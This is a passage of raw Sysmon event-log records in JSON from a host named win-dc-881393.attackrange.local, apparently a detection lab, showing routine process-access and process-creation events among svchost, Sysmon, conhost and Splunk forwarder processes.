C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:53.075","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8149,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:53.075\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:53.075","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8150,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:53.075\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-00103F1E0500}\r\nSourceProcessId: 2768\r\nSourceThreadId: 2656\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-0515-5F25-0000-0010C8261300}\r\nTargetProcessId: 4272\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:53.075","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-00103F1E0500}","SourceProcessId":"2768","SourceThreadId":"2656","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-0515-5F25-0000-0010C8261300}","TargetProcessId":"4272","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8151,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:53.215\r\nSourceProcessGUID: {A837DB8D-0515-5F25-0000-0010C8261300}\r\nSourceProcessId: 4272\r\nSourceThreadId: 4372\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nTargetProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:53.215","SourceProcessGUID":"{A837DB8D-0515-5F25-0000-0010C8261300}","SourceProcessId":"4272","SourceThreadId":"4372","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","TargetProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","TargetProcessId":"2868","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":8152,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:53.747\r\nProcessGuid: {A837DB8D-0515-5F25-0000-001088281300}\r\nProcessId: 3788\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nFileVersion: ?\r\nDescription: ?\r\nProduct: ?\r\nCompany: ?\r\nOriginalFileName: ?\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\" --ps2\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C\r\nParentProcessGuid: {A837DB8D-0239-5F25-0000-001064190500}\r\nParentProcessId: 2868\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:00:53.747","ProcessGuid":"{A837DB8D-0515-5F25-0000-001088281300}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","FileVersion":"?","Description":"?","Product":"?","Company":"?","OriginalFileName":"?","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\" --ps2","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C","ParentProcessGuid":"{A837DB8D-0239-5F25-0000-001064190500}","ParentProcessId":"2868","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 06:00:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8153,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:53.747\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nSourceProcessId: 2868\r\nSourceThreadId: 2168\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {A837DB8D-04FE-5F25-0000-001075A31200}\r\nTargetProcessId: 3788\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:53.747","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","SourceProcessId":"2868","SourceThreadId":"2168","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{A837DB8D-04FE-5F25-0000-001075A31200}","TargetProcessId":"3788","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8154,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:53.747\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-04FE-5F25-0000-001075A31200}\r\nTargetProcessId: 3788\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:53.747","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-04FE-5F25-0000-001075A31200}","TargetProcessId":"3788","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:00:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8155,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:53.747\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:53.747","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8156,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:53.747\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:53.747","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8157,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:53.747\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 